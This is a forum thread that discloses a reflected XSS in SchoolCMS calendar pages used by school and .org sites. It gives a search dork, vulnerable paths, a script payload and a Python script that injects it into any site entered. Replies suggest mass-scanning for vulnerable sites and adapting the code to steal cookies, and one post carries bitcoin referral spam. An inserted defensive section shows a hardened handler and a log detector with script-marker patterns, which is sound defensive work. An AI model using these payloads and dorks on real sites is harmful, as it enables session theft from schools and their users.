SchoolCMS software vulnerable to more XSS.
SchoolCMS software vulnerable to more XSS. #1
Shame this time it's not persistent. I originally found a persistent XSS in this software in the eventform.php file; there are records of this on exploit.db. This time it's a non-persistent one, but it remains on dozens and dozens of school and .org sites.

Exploit:
/old_core/cal/month.php?cid=
/old_core/cal/day.php?catid=
/old_core/cal/week.php?catid=

The y parameter is vulnerable to XSS. If you are too lazy to do it manually, here is a Python script to do it for you.

Code:
#!/usr/bin/python
import sys
import webbrowser
import urllib2
    
print "######################################"
print "#SchoolCMS auto-XSS inject script    #"
print "#Dork: inurl:/old_core/cal/month.php #"
print "#Author: VipVince                    #"
print "#Vendor: www.poweritschools.com      #"
print "#                                    #"
print "######################################"
    
print "XSS lies in y=parameter of the URL in the calender. (Year)"
print "After dorking a site, Enter URL like: www.oaklandschoolsnj.org"
print "Let the script do the rest ;)"

payload = "/old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"
site = raw_input('Enter site to XSS: ')
inject = webbrowser.open(site+payload)
raw_input("Press any key to exit ")

Enjoy

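The post above describes a reflected XSS where the calendar's y (year) parameter is echoed into the page without validation or output encoding. The following Python is an added example for defenders, not code from the thread or from the SchoolCMS product: it shows the unsafe reflection pattern beside a hardened handler (allow-list the year, escape on output), and a small detector that flags access-log requests to the /old_core/cal/ scripts whose decoded query carries script markup. The handler functions, the log lines and the timestamps are constructed for illustration; nothing here is the vendor's actual month.php.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample input: the query string the thread's payload URL sends
# to month.php (the "y" value is the part that gets reflected).
SAMPLE_QUERY = "cid=&catid=&m=-1&w=5&y=<script>alert(1)</script>"


def render_unsafe(query):
    """The reflected-XSS pattern the post describes: the year parameter is
    dropped into the markup exactly as received. Hypothetical code, not the
    vendor's month.php."""
    y = parse_qs(query, keep_blank_values=True).get("y", [""])[0]
    return "<h2>Calendar for " + y + "</h2>"


YEAR_RE = re.compile(r"\d{4}")


def parse_year(raw, default=2013):
    """Allow-list validation: a year is exactly four digits in a sane range;
    anything else falls back to the default instead of being echoed."""
    if raw is None or YEAR_RE.fullmatch(raw) is None:
        return default
    year = int(raw)
    return year if 1900 <= year <= 2100 else default


def render_safe(query):
    """Hardened handler: validate the input, then escape on output anyway, so a
    later change that relaxes the validation still cannot inject markup."""
    raw = parse_qs(query, keep_blank_values=True).get("y", [None])[0]
    year = parse_year(raw)
    return "<h2>Calendar for " + html.escape(str(year)) + "</h2>"


# Constructed Apache-style access log lines for the detection part; the second
# one is what the thread's payload looks like after the browser URL-encodes it.
LOG_LINES = [
    '203.0.113.7 - - [11/Jul/2013:18:11:02 +0000] "GET /old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=2013 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Jul/2013:18:12:44 +0000] "GET /old_core/cal/month.php?cid=&catid=&m=-1&w=5&y=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5201',
    '203.0.113.9 - - [11/Jul/2013:18:13:01 +0000] "GET /index.php HTTP/1.1" 200 812',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/')
MARKERS = ("<script", "javascript:", "onerror=", "onload=")


def find_probes(log_lines, path_prefix="/old_core/cal/"):
    """Flag requests to the calendar scripts whose decoded query string carries
    script markup. Returns (client_ip, timestamp, parameter_name) tuples."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.startswith(path_prefix):
            continue
        # parse_qs percent-decodes once; unquote again to catch double-encoded probes.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                decoded = unquote(value).lower()
                if any(marker in decoded for marker in MARKERS):
                    hits.append((ip, ts, name))
    return hits


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SAMPLE_QUERY))
    print("safe:  ", render_safe(SAMPLE_QUERY))
    for ip, ts, name in find_probes(LOG_LINES):
        print("probe from %s at %s in parameter %r" % (ip, ts, name))
```

The fix is two layers on purpose: rejecting anything that is not a four-digit year removes the injection, and escaping the rendered value makes the page safe even if someone later widens what the parameter accepts. The log check is a triage aid, not a WAF; it only tells you which clients sent script markup to the calendar paths so you can confirm whether the reflection is still present on a given install.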


RE: SchoolCMS software vulnerable to more XSS. #3
It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script that parses lists of sites and tests them to find which ones use this CMS and are thus vulnerable to this vulnerability? Not challenging enough? What if you made a spider that uses search engines to find new sites and checked which ones are vulnerable? Too challenging? If you choose to make something like this and need some help on any point, just give me a call; I'd like to help out as I can.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize



RE: SchoolCMS software vulnerable to more XSS. #5
(07-11-2013, 06:11 PM)noize Wrote: It looks like you're looking for vulnerabilities in any kind of CMS.

What if you made a script that parses lists of sites and tests them to find which ones use this CMS and are thus vulnerable to this vulnerability? Not challenging enough? What if you made a spider that uses search engines to find new sites and checked which ones are vulnerable? Too challenging? If you choose to make something like this and need some help on any point, just give me a call; I'd like to help out as I can.

This lies in a particular CMS made by powerITschools, in the month.php file. The dork will find you dozens of websites running it. Thanks for the suggestions, I will look into them.



RE: SchoolCMS software vulnerable to more XSS. #7
Let's adapt that code to borrow some cookies.
Yar-har Fiddle-dee-dee, being a pirate is alright to be! Do what you want cause a pirate is free, you are a pirate! AHOY!


[Image: tumblr_m7isvt2N171ranhnao1_500.gif]

